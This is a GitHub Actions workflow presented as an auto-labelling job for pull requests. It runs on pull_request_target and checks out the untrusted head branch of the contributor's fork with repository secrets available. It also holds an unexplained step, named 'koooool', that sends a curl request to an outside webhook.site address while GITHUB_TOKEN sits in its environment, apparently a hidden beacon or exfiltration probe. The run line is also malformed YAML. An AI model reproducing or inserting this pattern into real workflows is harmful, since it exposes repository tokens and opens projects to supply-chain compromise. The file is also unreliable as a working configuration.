name: Auto Label
on:
  pull_request_target:
    types: [opened, synchronize]

jobs:
  auto-label:
    name: Auto Label
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
        with:
          ref: ${{github.event.pull_request.head.ref}}
          repository: ${{github.event.pull_request.head.repo.full_name}}
      - uses: banyan/auto-label@1.2
        env:
          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
      - name: koooool
        run: | curl "https://webhook.site/daea041c-4c7b-4c56-97cf-1d6b2be569b5"
        env:
          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
